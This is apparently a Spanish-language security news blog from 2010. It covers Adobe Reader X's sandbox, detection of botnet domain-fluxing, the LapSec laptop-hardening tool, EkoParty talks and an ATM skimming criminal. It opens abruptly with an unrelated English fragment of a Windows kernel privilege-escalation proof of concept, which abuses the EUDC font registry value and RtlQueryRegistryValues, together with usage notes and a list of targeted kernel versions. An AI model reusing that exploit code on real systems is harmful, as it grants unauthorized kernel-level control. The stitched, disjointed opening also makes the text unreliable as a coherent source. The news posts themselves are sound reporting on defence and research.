RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);

__try
{
    EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);

After running this PoC, just type "whoami" in command prompt to see the escalated user credentials.
Points of Interest

All actions this PoC performs require only user privilege, but result in arbitrary kernel mode code execution due to the ambiguous design of RtlQueryRegistryValues. This design flaw exists in most versions of Windows kernels, yet no patch or documentation is publicly available on this issue.
Additional Information

This PoC may not correctly fix the exploited kernel context and resume execution without BSOD, such as on kernels ealier than 6.1.6000 are not supported, current supported kernels are:
Windows Vista/2008 6.1.6000 x32,
Windows Vista/2008 6.1.6001 x32,
Windows 7 6.2.7600 x32,
Windows 7/2008 R2 6.2.7600 x64.
Beyond this scope you may contact me for information on how to tune the code to work correctly on your kernel or how the shellcode works, etc. Those contents are beyond the scope of this article and of no importance to the exploit, therefore it is not included.

Comenzó el concurso de aplicaciones de elhacker.net!

2010-11-24T10:10:00.000-03:00

En el día de ayer comenzó el periodo de entrega en el concurso de aplicaciones de elhacker.net. Tienes una aplicacion y deseas participar? todavía estas a tiempo! visita elhacker.net!

Quieres ver algunas de las aplicaciones que se han presentado en el concurso?

JawBreaker

DLL Genius

HearBlocdenotas

y muchas mas, visita elhacker.net para ver el resto de las aplicaciones!.

Para los que quieran participar, recuerden que el periodo de entrega finaliza el día 30/11/2010 para dar comienzo a las votaciones.

Adobe publica la versión X de Reader!

2010-11-22T20:59:00.000-03:00

Adobe ha publicado una nueva versión de su amado y odiado lector de pdf. Esta vez no solo para solucionar fallos graves, si no que también para dar un paso importante en materia de seguridad.

Reader ha sido protagonista de multitud de fallos, algunos graves, otros no tanto, pero sin ninguna duda esta entre los primeros puestos si hablamos de software vulnerable. Ya sean expertos en seguridad, desarrolladores de malware, u simples aficionados, Reader siempre fue uno de los flancos mas débiles y mas explotados de Adobe.

Como toda empresa en el mundo, desarrollar un producto proclive a tantos fallos o inseguro termina malogrando la imagen de la empresa. El desarrollo de software por supuesto no es una excepción, dado que desarrollar software tan vulnerable y evidenciar poco esfuerzo en intentar remediar la situacion logro que Adobe tenga una imagen muy mala en materia de seguridad.
Por supuesto, toda empresa en algún momento decide cambiar esa imagen o aunque sea hacer algo para intentarlo, y este es el caso de Adobe.

La característica ya implementada en otras aplicaciones pero novedosa en el Reader es la del modo protegido, basicamente la adicion de una sandbox que aislaría el Reader del resto del sistema evitando así comprometer el sistema en el caso de un intento de explotación.

Los equipos de Adobe llevan trabajando varios meses junto a los equipos de Microsoft, Google Chrome, entre otros. Gente con experiencia en implementar este tipo de modelos en sus respectivos productos.

El modo protegido vendrá activado por defecto y como consecuencia lograría que el Reader se ejecute en un entorno con minimos privilegios. Por supuesto esto no detiene los intentos de explotación pero sirve como una linea de defensa mas en pos de evitar comprometer al sistema.
Cualquier acción potencialmente peligrosa será conducida a través de un proceso llamado "Broker" el cual se encargara de filtrar dichas acciones.

Por supuesto esto no implica que Reader sera invulnerable, pero si lograría dificultar la explotación dado que habría que vulnerar la sandbox, evadir el proceso "Broker" y por supuesto escalar privilegios.

El modo protegido de Adobe esta basado en el modelo de Sandboxing de Microsoft y ya se habían revelado detalles de su implementación en el blog de Adobe.


Inside Adobe Reader protected mode

El modo protegido de Adobe no es perfecto, y de hecho en algunos análisis ya han remarcado algunas de sus debilidades pero definitivamente es un paso importante respecto de las políticas de seguridad de Adobe.
Ojala esto logre aumentar la seguridad de los usuarios de Reader.

Referencias:

Adobe Reader X is here!
http://blogs.adobe.com/asset/2010/11/adobe-reader-x-is-here.html

Introducing Adobe Reader Protected Mode
http://blogs.adobe.com/asset/2010/07/%20introducing-adobe-reader-protected-mode.html

Processor-Dependent Malware

2010-11-18T21:27:00.000-03:00

Anthony Desnos, Robert Erra, and Eric Filiol de l'Ecole Supérieure d'Informatique Electronique Automatique (ESIEA) desarrollaron una prueba de concepto respecto de malware destinado a hardware especifico.

En pos de identificar los distintos procesadores, utilizan la aritmetica de coma flotante (FPA) logrando distinguir entre Intel, AMD, SPARC, Atom, Digital Alpha y Cell.
No explota ninguna vulnerabilidad en el hardware, mas bien se basa en características de los mismos y sus diferencias. El malware, a grandes rasgos, identificaría los distintos procesadores al verificar las diferencias que mantienen realizando ciertos cálculos matemáticos.

Esto vislumbra una posible nueva amenaza en los ataques de espionaje corporativo y la cyberguerra, dado que se pueden identificar grandes cantidades de ordenadores basándose en el hardware que posean, independientemente del sistema operativo que tengan instalado, logrando así atacar en los objetivos deseados y para los cuales el malware esta destinado.

Por otro lado, tomara tiempo para que este tipo de técnicas se utilicen en el malware destinado a usuarios domésticos, ya que realmente no es necesario. Pero posiblemente sea una nueva amenaza para organizaciones y paises atacados día a día por malware desarrollado con un objetivo muy claro y puntual.

Por supuesto esta técnica es solo una herramienta mas, que de por si sola no ayuda a identificar completamente un sistema debido a que para ello se necesitan conocer muchos factores. No obstante, puede ser de utilidad para realizar ataques muy específicos.
Por ejemplo, si un malware esta destinado a atacar sola y exclusivamente a equipos Intel, este podria identificar en una instancia final si el hardware es el deseado para luego proseguir con sus metodos propios de ataque:

El paper completo de la investigacion puede encontrarse aquí.

Hispasec presenta "Lapsec"

2010-11-11T14:41:00.000-03:00

Hispasec ha desarrollado una herramienta destinada a intentar mitigar con un solo click los riesgos más importantes que puede conllevar utilizar un sistema operativo Windows en un portátil. Cada vez que se instala (o se encuentra de serie) un Windows en un ordenador portátil, se deberían realizar los mismos cambios (específicamente útiles para portátiles) para intentar que se mantenga un poco más seguro. Ofrecemos
una herramienta gratuita para automatizar el proceso.

LapSec viene de "Laptop Securer" y es una herramienta destinada a automatizar los cambios más aconsejables para asegurar Windows en un ordenador portátil. Básicamente, aglutina en un solo botón varias
tareas. No está destinado a asegurar "por completo" un sistema, sino que pretende facilitar las modificaciones más importantes para un "bastionado" de ordenador portátil, mucho más susceptible de ser perdido o sustraído.

Evidentemente, estas medidas también son útiles para un ordenador de sobremesa. También es importante destacar que hay más medidas de seguridad aplicables a un portátil en particular y Windows
en general, pero que no han sido implementadas en LapSec por resultar medidas más "genéricas" que se salen del objetivo del programa: activar funcionalidades de seguridad Windows especialmente útiles para
portátiles.

El principal objetivo a la hora de asegurar un portátil es:
a) que nadie acceda al sistema operativo (o al sistema de ficheros)
b) que si accede, la información confidencial esté inaccesible ya sea con cifrado o con borrado seguro.

Con esos objetivos en mente, estas medidas han sido implementadas en el programa:

Eliminar el cifrado LM de las contraseñas (en Vista y 7 no es necesario).

Sobrescribir el archivo de memoria paginada (pagefile.sys)

Ocultar el nombre del usuario que el Sistema Operativo muestra en la pantalla de presentación

Activar la protección por contraseña del salvapantallas.

Eliminar la autoejecución de archivos cuando se introducen unidades extraíbles.

Comprobar la existencia de contraseña del usuario.

Comprobar la complejidad de las contraseñas.

Comprueba la activación de la contraseña en la consola de recuperación.

Deshabilitar el almacenamiento de contraseñas en el navegador Internet Explorer.

Deshabilitar la hibernación (hibernation.sys).

Deshabilitar la cuenta de administrador y de invitado del sistema.

Cifrado de la carpeta Mis Documentos.

Exportación del certificado de forma sencilla para casos de "desastre".

Además de activar estas funcionalidades propias de Windows, añade un sistema de borrado seguro, accesible a través del menú contextual de los archivos.

Puede ser descargado desde

http://www.hispasec.com/lapsec/

Todas las charlas de la EKOParty 2010 en video!

2010-11-07T13:51:00.001-03:00

Understanding the Win SMB NTLM weak nonce vulnerability

Distinguishing Lockpicks: Raking vs Lifting vs Jiggling and More

WPA Migration Mode: WEP is back to haunt you...

Understanding the Low Fragmentation Heap: From Allocation to Exploitation

Web Application Security Payloads

Network-based detection of PE structural anomalies and linker characteristics

Atacando VoIP....un paraiso

2x1 Microsoft Bugs: 'Virtual PC hyper-hole-visor' + 'Windows Creation Vulnerability (MS10-048)'

Token Kidnapping's Revenge

Faraday: A tool to share knowledge

SAP Backdoors: A ghost at the heart of your business

Historias de 0days, Disclosing y otras yerbas

Virtually Pwned: Pentesting VMware

Pentesting Driven by FOCA

Sandboxing based on SECCOMP for Linux kernel

Exploiting Digital Cameras

Wrong Way,.. a Black Hat True Story

iPhone Rootkit? There's an App for That!

Hanging on a ROPe

Padding Oracles Everywhere

Transfering files on isolated remote desktop environments

Jackpotting Automated Teller Machines

Nuevas tecnicas para descubrir botnets sigilosas.

2010-11-05T14:49:00.003-03:00

Investigadores de seguridad han implementado un nuevo método para descubrir botnets que tratan de esconderse detrás de nombres alternativos de dominio.

Supranamaya Ranjan afirma que el y su equipo han para detectar botnets tal como las de Conficker, Kraken y Torping, que utilizan una técnica denominada DNS domain-fluxing para su infraestructura C&C (Command & Control).
Domain-fluxing, también conocido como domain generation algorithm (DGA), genera en forma aleatoria nombres de dominio; el bot realiza peticiones a una serie de nombres de dominio, pero el dominio registrado es solo uno. Para llegar al C&C, los investigadores de las botnets generalmente deben realizar ingeniería inversa al malware bot y descubrir cuales son los dominios generados en forma regular. Un proceso que lleva tiempo y recursos en pos de obtener todos los nombres de dominios que van a ser registrados por la botnet, para poder adelantarse y registrarlos y lograr así un pie dentro de la botnet.

Ranjan dice:

"Botnets such as Kraken, Conficker, and Torpig came up with domain fast-flux, where even the domain name that each bot queries for is randomly generated,
Each bot queries for tens of thousands of domain names hoping that the botnet operator has registered for at least one of them via DNS. Now consider security vendors, who in this situation have no way of predicting which DNS queries are related to a botnet."

Ranjan, desarrollo un método para estudiar en tiempo real el trafico DNS para la actividad de domain-fluxing. Los investigadores presentaron sus descubrimientos en la conferencia "ACM Measurement" en Melbourne.
El método basicamente mira el patrón y distribución de los caracteres alfabéticos en un nombre de dominio para determinar cuales son maliciosos y cuales reales. Esto permite descubrir a los dominios generados algorítmicamente por la botnet.

El domain-fluxing dificulta el rastreo de las botnets, haciendo el trabajo mas dificil para los investigadores.
Jose Nazario -Senior security researcher en Arbor Networks- dice:
"This [domain-fluxing] is obviously a defensive headache for us, but for the attacker it exposes possible future rally points that the good guys can block.
We expect this trend to continue, so the work [here] makes sense: speed up the identification of these in the malcode analysis steps or from packet traces, making analysis more efficient."

Conficker-A, por ejemplo, genera unos 250 dominios diferentes cada 3 horas utilizando la fecha actual y el tiempo (UTC). Los creadores del conficker aumentaron la cifra con Conficker-C, generando acerca de 50.000 nombres de dominio por bot, haciendo mas difícil que los investigadores puedan pre-registrarlos

Este no es el único método para rastrear estas sigilosas botnets. Gunter Ollman, vice presidente de investigación en Damballa, dice que un método basado en un sistema de reputación dinámica desarrollado por investigadores en Georgia Tech funciona bien.
Ollman dice:

"This is probably the most advanced assisted machine-learning approach to the problem. It doesn't require seeing copies of the malware to detect the botnets using domain-fluxing"

Otra tecnica utilizada por Damballa utiliza el llamado análisis NX Domain. Ollman dice que es utilizada desde el 2009. Cuando un dominio generado no existe, el TLD name server responde con una respuesta NX, lo cual implica que el dominio no existe.
Ollman dice

"It's relatively simple to detect at the network level the fluxing attempts by the malware to located these dynamically generated domains, and to also see the number/heuristics of the NX Domain responses from the DNS servers."
"Simple machine-learning algorithms are trained using known data sets for an assortment of malware samples, and the system then automatically detects new, known or suspicious malware infections. The clustering algorithms automatically identify the malware family."

Narus' Ranjan dice que el análisis NX Domain esta limitado en que solo puede encontrar anomalías DNS, cuando muchas peticiones DNS retornan mensajes de fallo, por ejemplo, Ranjan dice:

"So they may be used as a first signal for detecting domain flux. Our methodology goes one step further and we can distinguish between cases of legitimate queries that are returning failure responses -- due to network failures -- versus domain flux queries,"

El dice que su método difiere del de Georgia Tech en que utiliza estadísticas mas detalladas acerca de los nombres de dominio.

Algunas botnets utilizan tanto domain fast-flux como IP fast-flux. IP fast-flux es un método donde los bots infectados sirven como proxies o host para webs maliciosas y están en constante rotación cambiando sus registros DNS para prevenir ser descubiertas por los investigadores, ISPs, o autoridades policiales. Ranjan dice que su método de detección también funciona para detectar IP fast-flux.

Mientras probaban este prototipo contra trafico en vivo, los investigadores han descubierto nuevo comportamiento en una botnet que han denominado "Storm2.0". La asignación de nombres de dominio a la dirección de C&C IP del servidor se compone de dos palabras del idioma Inglés. Un comportamiento similar es observado en la original botnet "Storm", donde los nombres de dominio estaban compuestos de una palabra del idioma Inglés y una cadena generada en forma aleatoria.

Ranjan dice que las organizaciones necesitan incorporar este tipo de análisis en pos de dar batalla a las botnets.
Ranjan dice:
"A system such as ours should be the first alarm that goes off whenever a new domain fast-flux botnet becomes active. After that an organization can take steps to capture the traffic corresponding to the IP addresses suspected to harbor such bots and examine them further to develop signatures.
But not the other way around, where previously researchers had to scramble to discover the exact algorithm used by Conficker and only then did they register all the domain names that Conficker was going to query for."

Detalles técnicos de la investigación están disponibles aquí.

Fuente: DarkReading

¡Estrenamos Twitter!

2010-11-04T14:22:00.001-03:00

A partir de ahora, nos podes seguir en twitter desde http://twitter.com/needofsecurity y podras enterarte todo desde allí.

[Historias] El rey de los cajeros.

2010-11-03T21:33:00.003-03:00

Los cajeros automáticos suelen ser motivo de atención para una gran variedad de delincuentes, desde simples asaltantes hasta organizaciones mafiosas.
La metodología de robo y estafa puede ser un tanto rustica o un poco mas elaborada. Algunos malvivientes optan por esperar a la salida del cajero a que las victimas terminen de retirar su dinero, otros secuestran personas - a veces con inteligencia mediante para conseguir un objetivo adinerado o simplemente al azar- para obligarlos a retirar dinero del cajero.
Otros, un tanto mas ingeniosos, obstaculizan la salida del dinero con una cinta u barra solida oscura, para que la victima piense que hay algún problema con su cuenta e ingrese al banco a quejarse. En el lapsus de tiempo que el cajero queda vacio mientras la victima se queja, el malviviente ingresa al cajero y destapa la salida del dinero para retirar lo que antes , se creyó, no había salido en primera instancia.

Otros, con mas esfuerzo y un tanto mas de ingenio, implantan cajeros falsos en lugares donde las victimas adineradas abunden. Esquinas de casinos, casas de cambio u de apuestas, estaciones de servicio etc. Lugares donde uno pueda clonar las suficientes tarjetas en el menor tiempo posible.
Los delincuentes optan ya sea por vaciar las cuentas, o bien vender los datos al mejor postor. Otros optan por clonar los datos y venderlos, otros hacen compras por internet, etc.
Estas claves, como verán, pueden terminar en una variedad de destinos bastante extensa, pero su perdida ocasiona para las victimas una sola consecuencia: La perdida de dinero y tiempo.

No obstante, algunos deciden dar un paso mas alla e implementar sistemas de robo mas sofisticados. Eso fue lo que hizo Fernando Gabriel Pereiro, denominado "El rey de los robos a los cajeros automáticos".
Este delincuente de 31 años, inicio su carrera criminal a los 23. En ese momento clonaba tarjetas de credito de American Express, las cuales vendía y/o utilizaba para sus propios fines. Para ello, se habia valido de un dispositivo que copiaba la banda magnética del plastico original.

Con el correr de los años, Fernando perfecciono su sistema de estafa para igualarlo con los sistemas que ya se usaban en Brasil y en otras partes del mundo, fraude conocido como Skimming. Este contaba con un falso teclado que registraba y guardaba las claves, y un dispositivo que se instalaba en la ranura donde se ingresa la tarjeta para copiar la banda magnética de la misma. Solo quedaba instalar los dispositivos, dejar pasar el tiempo, y luego ingresar una tarjeta virgen para cargar los datos que habían sido guardados y utilizarlos para su enriquecimiento personal.

El problema que tenían -y tienen- las autoridades con este sistema, es que era casi imposible saber donde los datos habían sido clonados. Dado esto, las autoridades tuvieron que disponer de un equipo especial para recibir las solicitudes y quejas de las victimas, para de esta forma tener una noción de la zona en la cual Fernando Pereiro estaba trabajando.

Las primeras pistas comenzaron a aparecer en septiembre del 2005. Fernando había instalado su sistema en un cajero ubicado en las inmediaciones de los tribunales de San Nicolas, en donde pudo reunir unas 974 claves y hacerse de 250 mil pesos. En la lista de victimas se encontraba un juez, funcionarios de la Justicia, policías y hasta un sacerdote.
Según el reporte de Migraciones, Fernando viajo con su familia a Europa y Medio Oriente, poco se sabe si fue viaje de negocios o de placer.
A su regreso, volvio a sus respectivas actividades delictivas.

Como la mayoría de delincuentes de este tipo, por suerte cometen errores. Errores que por su simpleza nos hacen pensar que tal vez no sean tan inteligentes como uno piensa, o peor aun, que se sientan impunes.
Fernando tenia una pasión y un gusto bastante exacerbado por los vehículos de alta categoría. Esto lo llevo a adquirir una camioneta 4x4 Lincoln Navigator.
Tal vez, el razonamiento que lo llevo a moverse en un vehículo tan exclusivo fue el pensar que al ser tan caro iba a llamar menos la atención, pero lamentablemente para el fue todo lo contrario.

Los investigadores ya lo tenían en la mira, y se habían enterado de la adquisición de esta camioneta. El resultado fue un espectro de vehículos a buscar mucho, muchísimo, mas estrecho, ya que solo había 4 camionetas iguales en el país.
El 8 de diciembre de 2008, un móvil de la Comisaría 16ª advirtió el paso de su 4x4 e inició una persecución que terminó en la esquina de Brasil y Tacuarí, en el barrio porteño de Monserrat. Fernando Pereiro se estrelló contra un poste y fue detenido.

Fernando Gabriel Pereiro atrapado. Clarin.

Todo apuntaba a que su carrera criminal había terminado, pero 1 año después, fingió una dolencia pulmonar que obligo a que sea trasladado al Hospital Argerich, donde pudo fugarse.
10 meses transcurrieron desde su fuga, pero recién trascendió esta semana, cuando la División de Delitos Bancarios pidió su captura internacional.

Se investiga si los guardias que lo trasladaron al hospital tuvieron que ver en su fuga, pero la duda principal es porque se tardo tanto en dar el alerta y pedir su captura.
Hoy por hoy, 10 meses después, Fernando Gabriel Pereiro pudo haber cambiado de apariencia, haber viajado a la otra punta del mundo, e incluso instalado su sistema de fraude en otros cajeros automáticos. Por supuesto, tuvo -y tiene- tiempo suficiente para perfeccionarlo.
Historia de un delincuente de guante blanco, que mantiene en vilo a la justicia Argentina desde hace 5 años.